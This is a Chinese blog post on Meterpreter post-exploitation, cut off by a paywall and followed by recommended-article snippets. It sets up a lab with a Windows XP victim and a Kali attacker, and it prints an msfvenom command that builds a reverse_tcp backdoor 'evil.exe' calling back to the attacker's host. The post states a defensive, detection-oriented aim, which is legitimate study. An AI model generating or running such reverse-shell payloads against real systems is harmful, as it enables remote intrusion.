Meterpreter Post-Exploitation分析

最新推荐文章于 2024-07-12 02:56:00 发布
原创 最新推荐文章于 2024-07-12 02:56:00 发布 · 2.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

零、简介

Metasploit是一款开源的安全漏洞检测利用工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,同时它也是黑客手中的利器,恶意攻击者可以利用它来生成恶意的二进制文件和恶意文档进行一系列的攻击行为。之前爆出的“永恒之蓝”漏洞更是有很多的恶意攻击者将msf与这一高危漏洞结合入侵了大量的机器。Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给攻击者一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时,攻击者必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理攻击者的会话,而Meterpreter则是攻击载荷和渗透攻击交互。本文主要通过对Meterpreter的Post-Exploitation进行分析,帮助我们怎样在计算中发现是否被植入恶意的meterpreter代码。

一、环境准备

被攻击主机:Windows xp sp3 (192.168.239.129)

攻击者主机:kali Linux (192.168.17.26)

二、前置知识

Post-Exploitation:攻陷目标中的某一台或者多台主机之后做的一些事情,包括但不限于:识别已经拿下主机的价值以及维持访问。主机对于攻击者来说是否具有一定的价值、具有多大的价值主要从以下两个个方面考虑:是否有敏感信息、数据,是否能够在后期的渗透中发挥价值。比如被攻陷的主机是否是组织中的关键人物、高层领导、系统管理员,被攻陷的主机是够能够尽可能的有内网不同网段的访问权限等等。

三、生成后门

(一)reverse_tcp

新版本的msf中已经由msfvenom取代了之前的msfpayload,所以这里我们用msfvenom来生成恶意文件。

msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.17.26 lport=9999 -f exe > /root/evil.exe

生成结束之后我们需要把这个后门传递到被攻陷的目标主机,实际中可能是通过webshell、上传漏洞、先导马等等。传递到目标主机之后直接运行既可以得到一个

最低0.47元/天 解锁文章
Tryhackme-Windows Exploitation Basics
个人博客
08-18 1621
Windows Exploitation Basics 文章目录Windows Exploitation BasicsWindows Fundamentals 1Task1 Introduction to WindowsTask2 Windows EditionsTask3 The Desktop (GUI)Task4 The File SystemTask5 The Windows\System32 FoldersTask6 User Accounts, Profiles, and Permission
Metasploit的网络流量分析和嗅探
Kali与编程
12-04 1524
网络嗅探和流量分析是网络安全和性能优化的重要手段,可以通过捕获、分析和解码网络数据包,了解网络通信的实际情况和安全风险,同时提高网络性能和优化网络配置。Zeek是Bro的新名称,是一款功能强大的网络安全监控和分析工具,可以通过网络嗅探和流量分析,识别和报告网络攻击和入侵行为,同时提供多种协议分析和可视化工具,支持自定义脚本和插件。Bro是一款功能强大的开源网络安全监控和分析工具,可以通过网络嗅探和流量分析,识别和报告网络攻击和入侵行为,同时提供多种协议分析和可视化工具,支持自定义脚本和插件。
post_exploitation:Windows和Linux流用于后期开发
04-07
我知道需要大修和清洁! 剥削后 用于后期利用的Windows和Linux流包含Linux和Windows One的衬板,用于枚举的二进制文件和预编译的利用位置。 作为对手思考时: 任何物有所值的骇客都能比别人更快地问谷歌 问自己:“如果我偷,漏,毁或改装,有3-5件事会潜在地使该公司垮台?” -或至少对他们开展业务的能力产生严重影响。 您可以拥有的最佳特征: Googling fast and identifying accurate info among the noise and bullshit Think of different things to try when you don't actually know Be aware that what you might be trying though can be dangerous not only for the e
OSCP Learning Notes - Post Exploitation(1)
weixin_30645617的博客
07-29 324
Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l payloads All the payload type in Metasploit are showing as below: Framework Paylo...
Metasploit之Post Exploitation
公众号shadow sock7
06-17 1864
参考: https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/autoroute这个很重要啊! The “autoroute” post module creates a new route through a Meterpreter sessions allowing you to
Tryhackme-Post-Exploitation Basics
个人博客
08-24 818
Post-Exploitation Basics 文章目录Post-Exploitation BasicsTask1 IntroductionTask2 Enumeration w/ PowerviewTask3 Enumeration w/ BloodhoundTask4 Dumping hashes w/ mimikatzTask5 Golden Ticket Attacks w/ mimikatztask6 Enumeration w/ Server ManagerTask7 Maintaini
post-exploitation:有用的脚本和模块
05-26
后开发 有用的脚本和模块
meterpreter > run /post/windows/manage/enable_rdp [-] The specified meterpreter session script could not be found: /post/windows/manage/enable_rdp 为什么报错
最新发布
08-23
- Meterpreter 中的 `run` 命令用于运行 Metasploit Framework 中的 post-exploitation 模块(即 `post` 模块)。 - 正确的模块路径应该是类似于:`post/windows/manage/enable_rdp`(没有前面的斜杠 `/`)。 2. ...
meterpreter > shell [-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for argum
10-30
Meterpreter 是 Metasploit 框架中的一个交互式后渗透环境(Post Exploitation Console),当你成功连接到一个远程服务器并通过漏洞执行了 Meterpreter payload 并获得了控制权后,通常可以使用 `meterpreter > ...
[Pentester Lab]PHP Include And Post Exploitation
CD的博客
04-11 1159
本文是Pentester Lab上的PHP Include And Post Exploitation实验。实验中使用了靶机(提供的ISO),以及一台云主机(用于实现反向shell)。 一、简介 大致步骤如下: 1. 指纹识别 2. 检测和利用PHP文件包含漏洞 3. 后期利用 二、指纹识别 telnet, nc, … Nikto 三、检测并利用PHP文件包含漏洞 ...
Meterpreter木马技术分析与防范
qq_40637292的博客
07-09 4517
文章转载,原文地址:http://www.bmzsec.com/archives/562.html木马被制造的原因可能有很多:有的用木马获取用于黑色产业,有的则是商家收集个人感兴趣信息以便推送类似信息达到推广效果最后从中获利,尤其在一个几乎家家户户都有电脑的时代 。因此信息时代的博弈,首要任务是网络安全。通过尝试以木马开发者的角度出发,从传统技术中木马的通信实现、驻留功能、窃取数据功能,到新技术适...
Meterpreter 简述
weixin_34318272的博客
11-07 377
Metasploit是Windows系统下的ShellCode—meterpreter! MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 exploit是指“漏洞及其利用”,其...
探索 Post-Exploitation 的世界 - mubix/post-exploitation
gitblog_00098的博客
03-16 439
探索 Post-Exploitation 的世界 - mubix/post-exploitation 是一个实用的工具集合,为渗透测试者、红队成员和安全研究人员提供了一个强大的平台,用于进行后渗透利用和持续访问操作。它包含了多个模块,可以帮助你在攻击链的不同阶段执行关键任务。 项目用途 mubix/post-exploitation 可以用于: 收集信息:收集目标系统上的各种信息,包括但不限于操...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 4554
From:https://blog.youkuaiyun.com/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
Meterpreter 是一种 Metasploit 攻击负载
weixin_40919176的博客
07-12 288
Meterpreter 是一种 Metasploit 攻击负载,它提供了一个交互式 shell,攻击者可以通过该 shell 探索目标机器并执行代码。Meterpreter 使用内存中 DLL 注入进行部署。因此,Meterpreter 完全驻留在内存中,不会将任何内容写入磁盘。Meterpreter 将自身注入受感染的进...
meterpreter载荷执行过程及原理
redwand的博客
05-31 1805
本文通过翻译rapid7的文章,学习理解了meterpreter载荷执行过程及原理,并学习了stage payload的设计理念,这为将来的木马免杀技术学习及通信原理的学习都有很好的帮助,最后在rapid文章翻译基础上,笔者加入了自己的绘图理解,形象的展现了这一过程。
【网络安全】MSF常用的渗透技巧总结
Yb528970805的博客
09-27 1535
在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网,如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。二、建立一条隧道连接至跳板机,将目标为私有地址的数据发发送至跳板机,目标为私有地址的数据包发送至公网地址会被哦公网路由抛弃,无法访问到目标。在 kaili 中配置隧道要使用的端口,现在版本的 msf 默认是用 socket5 协议,所以在 kali 中也使用 socket5,一、在跳板机上写路由,实现对其他网段的数据包进行转发。
Metasploit 入门到高级【第一章】
Kali与编程
03-27 664
Metasploit是一款功能强大、广泛应用的漏洞利用框架,其组成部分包括框架、模块、插件、资源文件等。Metasploit是一款功能强大、广泛应用的漏洞利用平台,其发展经历了多个阶段,包括创始人、版本更新和社区支持等方面。Metasploit的不断发展壮大得益于其庞大的社区支持,同时,Metasploit也为安全专业人员提供了一个强大、灵活、易于使用的漏洞利用平台。Metasploit的核心是一个Ruby编写的框架,该框架提供了一系列API和工具,帮助用户进行渗透测试和漏洞利用等工作。
渗透测试详解
IT 技 术 交 流
12-15 703
在学习渗透测试之初,有必要先系统了解一下它的流程,静下心来阅读一下,树立一个全局观,一步一步去建设并完善自己的专业领域,最终实现从懵逼到牛逼的华丽转变。 渗透测试是通过模拟恶意黑客的攻击方法,同时也是在授权情况下对目标系统进行安全性测试和评估的过程。 需要强调的是,重点是测试,是过程,而不是不计后果的攻击或测试防御,它是一套科学流程,不局限于某一工具或技巧的运用。 渗透测试流程: 前期交互 (Pre-engagement Interactions) 渗透测试团队与客户组织进行交互讨论,最重要的是确定渗透
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值